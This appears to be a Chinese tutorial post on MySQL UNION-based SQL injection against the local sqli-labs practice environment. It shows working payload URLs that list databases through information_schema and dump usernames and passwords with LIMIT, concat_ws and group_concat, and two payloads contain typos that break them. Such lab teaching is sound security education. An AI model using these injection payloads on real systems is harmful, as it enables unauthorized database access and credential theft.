mysql联合注入_SQL最易懂系列教程(3.union联合查询注入补充)

上节内容我们讲了union联合查询注入的大致步骤,在第5步查询数据库中的表,第6步查询表中的字段名我们用到一些查询语句这里我们进一步说明一下。

1.在MYSQL数据库安装好以后,就已经内置了几个库

8e455de0cf2add7b74876d2996594c3d.png

其中MYSQL内置的information_schema数据库,它功能强大,是我们进行MYSQL注入的基石。

通过information_schema我们可以窥透整个MYSQL的运行状况,也可以查看到数据中的所有信息。

2.查询数据核心语法

d42f9a3e11a21f30d9209c2adf107e6d.png

提示:所有类型的SQL注入,都是基于查库、表、列语句。

3.如果查询出来的结果太多,页面上无法显示查询结果,我们有如下的解决方法。

我们以sqli-labs环境作为演示。

我们输入如下图语句查询有哪些库

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata)--+

d6ffdfef93f794cdfed9a653e723bfb9.png

结果显示:超过一行无法显示。

我们这里介绍第一种方法

这里我们先介绍下函数limit

limit [偏移量],[数量]

偏移量也是从0开始(和c语言数组是一个道理),数量是选取多少个数据项。

常见作用:

当某些页面只能回显特定个数的数据时,可以用limit进行限制

例如:我们在查询语句中后加上 limit 0,1

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata limit 0,1)--+

cac1f6e72008abd85f857229789049d8.png

显示了第一个数据库information_schema

我们在查询语句中后加上 limit 1,1

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata limit 1,1)--+

62b0026289b18ba4168c5822d3c0ef47.png

显示了第2个数据库challenges,以此类推,查完所有的数据。

我们这里介绍第二种方法

这里我们先介绍三个函数

concat():没有分割符的连接字符串

concat_ws():含有分隔符的连接字符串

group_concat():连接一个组的所有字符串,并以逗号分割每一条数据

我们在查询语句中加上:group_concat

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select gruop_concat(schema_name)from information_schema.schemata)--+

c925b727620e46b03b1277be3b62119e.png

所有结果在一行显示

接下来我们查询用户名和密码

输入查询语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(select group_concat(username,password) from security.users)--+

8df2628e416913fcd6ce5549b7cbf0e2.png

所有用户名和密码都显示出来了,我们发现账号和密码连接到一起,分不清各是多少。

这里就需要用到concat_ws函数了

我们输入:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(selectconcat_ws('-',username,password) from security.users limit 0,1)--+

bff9e53dcdf546d4a5175966a2f87a45.png

这里要加 limit 0,1不然显示不出来。

那我们既想把用户名和密码分隔开,又想一次性显示出来怎么办

我们输入下面语句:

http://127.0.0.1:81/Less-1/?id=-1' union select 1,2,(selectgroup_concat(username,'-',password) from security.users)--+

5df345639375907cdf0d67d9c14cc2af.png

这里用户名和密码都显示出来了,而且用户名和密码用—隔开便于识别。

注意:

4da7c1183be537a8c7cf82aea3b58c75.png

本文仅代表作者个人观点,不代表SEO研究协会网官方发声,对观点有疑义请先联系作者本人进行修改,若内容非法请联系平台管理员。更多相关资讯,请到SEO研究协会网www.seoxiehui.cn学习互联网营销技术请到巨推学院www.jutuiedu.com。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值